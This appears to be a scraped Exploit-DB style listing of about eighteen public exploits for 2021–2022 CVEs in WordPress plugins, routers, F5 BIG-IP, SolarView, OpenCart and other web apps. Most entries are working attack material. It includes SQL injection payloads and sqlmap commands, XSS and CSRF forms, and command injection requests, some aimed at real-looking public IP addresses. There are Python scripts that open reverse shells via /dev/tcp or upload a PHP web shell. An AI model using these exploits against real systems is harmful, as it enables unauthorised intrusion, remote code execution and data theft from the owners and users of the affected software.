
WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
# Exploit Title: WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated) # Date: 05-02-2022 # Exploit Author: Hassan Khan Yusufzai - Splint3r7 # Vendor Homepage: https://wordpress.org/plugins/stafflist/ # Version: 3.1.2 # Tested on: Firefox # Contact me: h [at] spidersilk.com # Vulnerable Code: $w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ? ... $where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR LOWER(firstname) LIKE '%{$w}%' OR LOWER(department) LIKE '%{$w}%' OR LOWER(email) LIKE '%{$w}%'" : ""); # Vulnerable URL http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI] # POC ``` sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*' --cookie="wordpress_cookies_paste_here" ``` # POC Image https://prnt.sc/AECcFRHhe2ib
-
WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
Exploit Title: WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF) Date: 2021-07-27 Exploit Author : WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF) Vendor Homepage : https://wpscan.com/plugin/blue-admi Version : <= 21.06.01 Tested on: windows 10 Professional CVE : CVE-2021-24581 <html> <body> <form action="http://example.com/wp-admin/admin.php?page=blue-admin&tab=blue_admin_login_page" method="POST" enctype="multipart/form-data"> <input type="hidden" name="ba_lp_attr[fm_bg_color]" value="FFFFFF" /> <input type="hidden" name="ba_lp_attr[fm_color]" value="777777" /> <input type="hidden" name="ba_lp_attr[logo_text]" value='WP"><script>alert(/XSS/)</script>' /> <input type="hidden" name="ba_lp_attr[logo_url]" value="https://example.com" /> <input type="hidden" name="ba_lp_attr[logo_img]" value="" /> <input type="hidden" name="ba_lp_attr[bg_color]" value="EEEEEE" /> <input type="hidden" name="ba_lp_attr[text_color]" value="222222" /> <input type="hidden" name="ba_lp_attr[bg_img]" value="" /> <input type="hidden" name="ba_lp_attr[bg_img_pos]" value="" /> <input type="hidden" name="ba_lp_attr[bg_img_rep]" value="" /> <input type="hidden" name="ba_lp_options_save" value="Save changes" /> <input type="submit" value="Submit request" /> </form> </body> </html>
-
Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated) # Google Dork: None # Date: November 1, 2021 # Exploit Author: Minh Khoa of VSEC # Vendor Homepage: https://ruijienetworks.com # Software Link: https://www.ruijienetworks.com/resources/products/1896-1900 # Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55 # Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO # CVE: CVE-2021-43164 #!/usr/bin/python3 import os import sys import time import requests import json def enc(PASS): key = "RjYkhwzx$2018!" shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key) return os.popen(shell).read().strip() try: TARGET = sys.argv[1] USER = sys.argv[2] PASS = sys.argv[3] COMMAND = sys.argv[4] except Exception: print("CVE-2021-43164 PoC") print("Usage: python3 exploit.py <target> <user> <pass> <command>") print("Example: python3 exploit.py 192.168.110.1 admin password 'touch /tmp/pwned'") sys.exit(1) endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET) payload = { "method": "login", "params": { "username": USER, "password": enc(PASS), "encry": True, "time": int(time.time()), "limit": False } } r = requests.post(endpoint, json=payload) sid = json.loads(r.text)["data"]["sid"] endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid) payload = { "method": "updateVersion", "params": { "jsonparam": "'; {} #".format(COMMAND) } } r = requests.post(endpoint, json=payload) print(r.text)
-
TLR-2005KSH - Arbitrary File Upload
# Exploit Title: TLR-2005KSH - Arbitrary File Upload # Date: 2022-05-11 # Shodan Dork: title:"Login to TLR-2021" # Exploit Author: Ahmed Alroky # Author Company : Aiactive # Version: 1.0.0 # Vendor home page : http://telesquare.co.kr/ # Authentication Required: No # Tested on: Windows # CVE: CVE-2021-45428 # Vulnerability Description # Because WebDAV (Web Distributed Authoring and Versioning) is enabled # on the remote server, Telesquare TLR-2021 allows unauthorized users to upload # any file (e.g. asp, aspx, cfm, html, jhtml, jsp, shtml), which can also lead to # remote code execution. # Through WebDAV, it is possible to upload an arbitrary # file using the PUT method. # Proof-of-Concept # Request PUT /l6f3jd6cbf.txt HTTP/1.1 Host: 223.62.114.233:8081<http://223.62.114.233:8081/> Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Connection: close Content-Length: 10
-
F5 BIG-IP 16.0.x - Remote Code Execution (RCE)
# Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://www.f5.com/products/big-ip-services # Version: 16.0.x # CVE : CVE-2022-1388 from requests import Request, Session import sys import json def title(): print(''' _______ ________ ___ ___ ___ ___ __ ____ ___ ___ / ____\ \ / / ____| |__ \ / _ \__ \|__ \ /_ |___ \ / _ \ / _ \ | | \ \ / /| |__ ______ ) | | | | ) | ) |_____| | __) | (_) | (_) | | | \ \/ / | __|______/ /| | | |/ / / /______| ||__ < > _ < > _ < | |____ \ / | |____ / /_| |_| / /_ / /_ | |___) | (_) | (_) | \_____| \/ |______| |____|\___/____|____| |_|____/ \___/ \___/ Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ ''') def exploit(url, lhost, lport): url = url + 'mgmt/tm/util/bash' data = { "command":"run", "utilCmdArgs":"-c 'bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1'" } headers = { 'Authorization': 'Basic YWRtaW46', 'Connection':'keep-alive, X-F5-Auth-Token', 'X-F5-Auth-Token': '0' } s = Session() req = Request('POST', url, json=data, headers=headers) prepped = req.prepare() del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15 ) #print(prepped.headers) #print(url) #print(resp.headers) #print(resp.json()) print(resp.status_code) if __name__ == '__main__': title() if(len(sys.argv) < 4): print('[+] USAGE: python3 %s https://<target_url> lhost lport\n'%(sys.argv[0])) print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\n'%(sys.argv[0])) print('[+] Do not forget to run the listener: nc -lvp 4444\n') exit(0) else: exploit(sys.argv[1],sys.argv[2],sys.argv[3])
-
TLR-2005KSH - Arbitrary File Delete
# Exploit Title: TLR-2005KSH - Arbitrary File Delete # Date: 2022-05-11 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: 1.0.0 # Vendor home page : http://telesquare.co.kr/ # Authentication Required: No # Tested on: Windows # CVE: CVE-2021-46424 # Proof-of-Concept # Request DELETE /cgi-bin/test2.txt HTTP/1.1 Host: 220.89.223.215:8083 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close
-
Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)
# Exploit Title: Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated) # Date: 2022-26-03 # Exploit Author: Eren Gozaydin # Vendor Homepage: https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip # Version: 1.0 # Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51 # CVE: CVE-2022-28080 # References: https://nvd.nist.gov/vuln/detail/CVE-2022-28080 ------------------------------------------------------------------------------------ 1. Description: ---------------------- Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in /royal_event/btndates_report.php#?= Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite, intercept the request from the affected page with the 'todate' parameter and save it as poc.txt. Then run SQLmap to extract the data from the database: sqlmap -r poc.txt --dbms=mysql 3. Example payload: ---------------------- (boolean-based) -1%27+OR+1%3d1+OR+%27ns%27%3d%27ns 4. 
Burpsuite request: ---------------------- POST /royal_event/btndates_report.php#?= HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Content-Length: 334 Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0 Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380 Referer: http://localhost/royal_event/btndates_report.php#?= User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 --f289a6438bcc45179bcd3eb7ddc555d0 Content-Disposition: form-data; name="todate" -1' OR 1=1 OR 'ns'='ns --f289a6438bcc45179bcd3eb7ddc555d0 Content-Disposition: form-data; name="search" 3 --f289a6438bcc45179bcd3eb7ddc555d0 Content-Disposition: form-data; name="fromdate" 01/01/2011 --f289a6438bcc45179bcd3eb7ddc555d0--
-
College Management System 1.0 - 'course_code' SQL Injection (Authenticated)
# Exploit Title: College Management System - 'course_code' SQL Injection (Authenticated) # Date: 2022-24-03 # Exploit Author: Eren Gozaydin # Vendor Homepage: https://code-projects.org/college-management-system-in-php-with-source-code/ # Software Link: https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f # Version: 1.0 # Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51 # CVE: CVE-2022-28079 # References: https://nvd.nist.gov/vuln/detail/CVE-2022-28079 ------------------------------------------------------------------------------------ 1. Description: ---------------------- College Management System 1.0 allows SQL Injection via parameter 'course_code' in /College-Management-System/admin/asign-single-student-subjects.php. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite, intercept the request from the affected page with the 'course_code' parameter and save it as poc.txt. Then run SQLmap to extract the data from the database: sqlmap -r poc.txt --dbms=mysql 3. Example payload: ---------------------- boolean-based blind Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ 4. 
Burpsuite request: ---------------------- POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Content-Length: 80 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns
-
SDT-CW3B1 1.1.0 - OS Command Injection
# Exploit Title: SDT-CW3B1 1.1.0 - OS command injection # Date: 2022-05-12 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: 1.0.0 # Vendor home page : http://telesquare.co.kr/ # Authentication Required: No # CVE : CVE-2021-46422 # Tested on: Windows # HTTP Request GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1 Host: IP_HERE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Accept: */* Referer: http:// IP_HERE /admin/system_command.shtml Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close
-
T-Soft E-Commerce 4 - SQLi (Authenticated)
# Exploit Title: T-Soft E-Commerce 4 - SQLi (Authenticated) # Exploit Author: Alperen Ergel # Contact: @alpernae (IG/TW) # Software Homepage: https://www.tsoft.com.tr/ # Version : v4 # Tested on: Kali Linux # Category: WebApp # Google Dork: N/A # CVE: 2022-28132 # Date: 18.02.2022 ######## Description ########################################### # # # # Step-1: Log in as Admin or as a privileged user # Step-2: Open Burp or ZAP and request the {PoC REQUEST PATH} vulnerable path # Step-3: Capture the request and save it as .txt # Step-4: Run SQLMAP with this command 'sqlmap -r {req.txt} --dbs --level 5 --risk 3 --tamper=space2comment' --random-agent' # Step-5: Now you will be able to see the databases; for more, search 'how to use sqlmap advance' # # Impact: An attacker can see what is in the database, which has a big impact, and the attacker can steal data... # # # ######## Proof of Concept ######################################## ========>>> REQUEST <<<========= GET /Y/Moduller/_Urun/Json.php?_dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=&SatisUst= &marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0¥i=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 HTTP/2 Host: domain.com Cookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxx@xx.com; customDashboardMapping=true; countryCode=TR; rest1SupportUser=0; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; PHPSESSID=fcfa85a5603de7b64bc08eaf68bc51ca; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password= Sec-Ch-Ua: 
"(Not(A:Brand";v="8", "Chromium";v="98" X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Sec-Ch-Ua-Platform: "Linux" Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://domain.com/srv/admin/products/products-v2/index Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 =============> RESULTS OF THE SQLMAP <========================== Parameter: SatisAlt (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: _dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=' AND 1331=1331 AND 'RcAU'='RcAU&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0¥i=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 --- back-end DBMS: MySQL 5 available databases [2]: [*] d25082_db [*] information_schema [13:05:31] [INFO] GET parameter 'SatisAlt' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable
-
T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS)
# Exploit Title: T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS) # Exploit Author: Alperen Ergel (alpernae IG/TW) # Web Site: https://alperenae.gitbook.io/ # Software Homepage: https://www.tsoft.com.tr/ # Version : v4 # Tested on: Kali Linux # Category: WebApp # Google Dork: N/A # Date: 2022-05-10 # CVE :N/A ######## Description ######## # # 1-) Log in to the administrator page and add a product # # 2-) Set the product name to the XSS payload # # 3-) Go back to the web site; the payload will then execute # # ######## Proof of Concept ######## ========>>> REQUEST <<<========= POST /Y/Moduller/_Urun/Ekle/Action.php HTTP/1.1 Host: domain.com Cookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxxx@xxx.com; customDashboardMapping=true; PHPSESSID=18d05ae557640c93fd9739e241850438; rest1SupportUser=0; nocache=1; last_products=12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1028 Origin: https://domain.com Dnt: 1 Referer: https://domain.com/srv/admin/products/save-edit/index?id=12 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close task=UPDATE&Kategori=18&UrunId=12&UrunAdi={PAYLOAD}&MarkaId=0&MarkaAd=&ModelId=0&ModelAd=&Tedarikci=0&TedarikciKodu=12&StokSayisi=100 &StokBirimId=1&StokBirimAd=Adet&EnYeniUrun=0&EnCokSatilan=0&AramaKelimeleri=&HamSatis=200&AlisFiyat=100&HavaleYuzde=0&Birim=0 &KDV=18&KdvGoster=false&point_catalog=false&IndirimliUrun=true&AltUrunVar=false&YeniUrun=true&AnaSayfaUrun=true&VitrinUrun=false &Gorunme=true&BayiUrun=false&SiparisNotuGoster=false&En=0&Boy=0&Derinlik=0&Agirlik=0&Desi=1&GarantiBilgisi= &TeslimatBilgisi=&UrunNot=&WsUrunKodu=T12&SeoAyar=3&SeoTitle=&SeoLink=deneme-urun-1&SeoDesc=&SeoKeyw= &Detay=%C3%9Cr%C3%BCn%20ekleme%20konusunda%20detayl%C4%B1%20bilgi%20i%C3%A7in%2C%20videomuzu%20 
izleyebilirsiniz%3A%C2%A0%0A%3Cdiv%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DoWlUHvi4IPw%22%3Ehttps%3A%2F%2Fwww.youtube.com% 2Fwatch%3Fv%3DoWlUHvi4IPw%3C%2Fa%3E%3C%2Fdiv%3E&AnaKategoriId=18&point=0&subscribe=0&subscribe_frequency=&subscribe_discount_rate=0 &UruneKargoUcretsiz=0&UyeUcretsizKargo=0&BayiUcretsizKargo=0&Sayisal1=0
-
Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS) # Date: May 11 2022 # Exploit Author: Pankaj Kumar Thakur # Vendor Homepage: https://surveysparrow.com/ # Software Link: https://surveysparrow.com/enterprise-survey-software/ # Version: 2022 # Tested on: Windows # CVE : CVE-2022-29727 # References: https://www.tenable.com/cve/CVE-2022-29727 https://github.com/haxpunk1337/Enterprise-Survey-Software/blob/main/Enterprise-Survey-Software%202022 #POC For Stored XSS Visit https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)// XSS Executed
-
SolarView Compact 6.0 - OS Command Injection
# Exploit Title: SolarView Compact 6.0 - OS Command Injection # Date: 2022-05-15 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: ver.6.00 # Vendor home page : https://www.contec.com/ # Authentication Required: No # CVE : CVE-2022-29303 # Tested on: Windows # Exploit # HTTP Request : POST /conf_mail.php HTTP/1.1 Host: HOST_IP Content-Length: 77 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://HOST_IP Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://HOST_IP/conf_mail.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close mail_address=%3Bid%3Bwhoami%3Bpwd%3Bls%3B&button=%83%81%81%5B%83%8B%91%97%90M
-
Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS) # Exploit Author: Akshay Ravi # Vendor Homepage: https://github.com/star7th/showdoc # Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.3 # Version: <= 2.10.3 # Tested on: macOS Monterey # CVE : CVE-2022-0967 Description: Stored XSS via uploading a file in .ofd format 1. Create a file with the .ofd extension and add the XSS payload inside the file filename = "payload.ofd" payload = "<script>alert(1)</script>" 2. Log in to showdoc v2.10.2 and go to the file library Endpoint = "https://www.site.com/attachment/index" 3. Upload the payload to the file library and click on the check button 4. The XSS payload will be executed once the URL is visited
-
OpenCart v3.x Newsletter Module - Blind SQLi
# Exploit Title: OpenCart v3.x Newsletter Module - Blind SQLi # Date: 19/05/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.opencart.com/ # Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=32750&filter_member=Zemez # Version: v.3.0.2.0 # Tested on: XAMPP, Linux # Contact: https://twitter.com/dmaral3noz * Description : The Newsletter Module, which is compatible with any OpenCart installation, allows SQL Injection via parameter 'zemez_newsletter_email' in /index.php?route=extension/module/zemez_newsletter/addNewsletter. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. * Steps to Reproduce : - Go to : http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter - Save the request in BurpSuite - Run the saved request with : sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs Request : =========== POST /index.php?route=extension/module/zemez_newsletter/addNewsletter HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Content-Length: 29 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Connection: Keep-alive zemez_newsletter_email=saud =========== Output : Parameter: zemez_newsletter_email (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: zemez_newsletter_email=saud%' AND 4728=(SELECT (CASE WHEN (4728=4728) THEN 4728 ELSE (SELECT 4929 UNION SELECT 7220) END))-- - Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: zemez_newsletter_email=saud%' OR (SELECT 4303 FROM(SELECT COUNT(*),CONCAT(0x716a6b7171,(SELECT 
(ELT(4303=4303,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xlVz%'='xlVz Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: zemez_newsletter_email=saud%' AND (SELECT 5968 FROM (SELECT(SLEEP(5)))yYJX) AND 'yJkK%'='yJkK
-
Contao 4.13.2 - Cross-Site Scripting (XSS)
# Exploit Title: Contao 4.13.2 - Cross-Site Scripting (XSS) # Google Dork: NA # Date: 04/28/2022 # Exploit Author: Chetanya Sharma @AggressiveUser # Vendor Homepage: https://contao.org/en/ # Software Link: https://github.com/contao/contao/releases/tag/4.13.2 # Version: [ 4.13.2 ] # Tested on: [KALI OS] # CVE : CVE-2022-1588 # References: - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/ - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2 - https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html --------------- Steps to reproduce: Navigate to the below URL URL: https://localhost/contao/"><svg//onload=alert(112233)>
-
m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-01-06 # Exploit Author: Malte V # Vendor Homepage: https://github.com/m1k1o/blog # Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip # Version: 1.3 and below # Tested on: Linux # CVE : CVE-2022-23626 import argparse import json import re from base64 import b64encode import requests as req from bs4 import BeautifulSoup parser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog') parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False) parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost', required=False) parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081, required=False) parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999, required=False) parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False) parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False) args = vars(parser.parse_args()) username = args['username'] password = args['password'] lhost_ip = args['ip'] lhost_port = args['lport'] address = args['url'] port = args['port'] url = f"http://{address}:{port}" blog_cookie = "" csrf_token = "" exploit_file_name = "" header = { "Host": f"{address}", "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "X-Requested-With": "XMLHttpRequest", "Csrf-Token": f"{csrf_token}", "Cookie": 
f"PHPSESSID={blog_cookie}" } def get_cookie(complete_url): global blog_cookie cookie_header = {} if not blog_cookie: cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}" result = req.get(url=complete_url, headers=cookie_header) if result.status_code == 200: blog_cookie = result.cookies.get_dict()['PHPSESSID'] print(f'[+] Found PHPSESSID: {blog_cookie}') grep_csrf(result) def grep_csrf(result): global csrf_token csrf_regex = r"[a-f0-9]{10}" soup = BeautifulSoup(result.text, 'html.parser') script_tag = str(soup.findAll('script')[1].contents[0]) csrf_token = re.search(csrf_regex, script_tag).group(0) print(f'[+] Found CSRF-Token: {csrf_token}') def login(username, password): get_cookie(url) login_url = f"{url}/ajax.php" login_data = f"action=login&nick={username}&pass={password}" login_header = { "Host": f"{address}", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "X-Requested-With": "XMLHttpRequest", "Csrf-Token": f"{csrf_token}", "Cookie": f"PHPSESSID={blog_cookie}" } result = req.post(url=login_url, headers=login_header, data=login_data) soup = BeautifulSoup(result.text, 'html.parser') login_content = json.loads(soup.text) if login_content.get('logged_in'): print('[*] Successful login') else: print('[!] 
Bad login') def set_cookie(result): global blog_cookie blog_cookie = result.cookies.get_dict()['PHPSESSID'] def generate_payload(command): return f""" -----------------------------13148889121752486353560141292 Content-Disposition: form-data; name="file"; filename="malicious.gif.php" Content-Type: application/x-httpd-php GIF<?php system(base64_decode('{b64encode(bytes(command, 'utf-8')).decode('ascii')}')); ?>; -----------------------------13148889121752486353560141292-- """ def send_payload(): payload_header = { "Host": f"{address}", "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "X-Requested-With": "XMLHttpRequest", "Csrf-Token": f"{csrf_token}", "Cookie": f"PHPSESSID={blog_cookie}" } upload_url = f"http://{address}:{port}/ajax.php?action=upload_image" command = f"php -r '$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'" payload = generate_payload(command) print(f"[+] Upload exploit") result = req.post(url=upload_url, headers=payload_header, data=payload, proxies= {"http": "http://127.0.0.1:8080"}) set_exploit_file_name(result.content.decode('ascii')) def set_exploit_file_name(data): global exploit_file_name file_regex = r"[a-zA-Z0-9]{4,5}.php" exploit_file_name = re.search(file_regex, data).group(0) def call_malicious_php(file_name): global header complete_url = f"{url}/data/i/{file_name}" print('[*] Calling reverse shell') result = req.get(url=complete_url) def check_reverse_shell(): yes = {'yes', 'y', 'ye', ''} no = {'no', 'n'} choice = input("Have you got an active netcat listener (y/Y or n/N): ") if choice in yes: return True elif choice in no: print(f"[!] 
Please open netcat listener with \"nc -lnvp {lhost_port}\"") return False def main(): enabled_listener = check_reverse_shell() if enabled_listener: login(username, password) send_payload() call_malicious_php(exploit_file_name) if __name__ == "__main__": main()
-
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2)
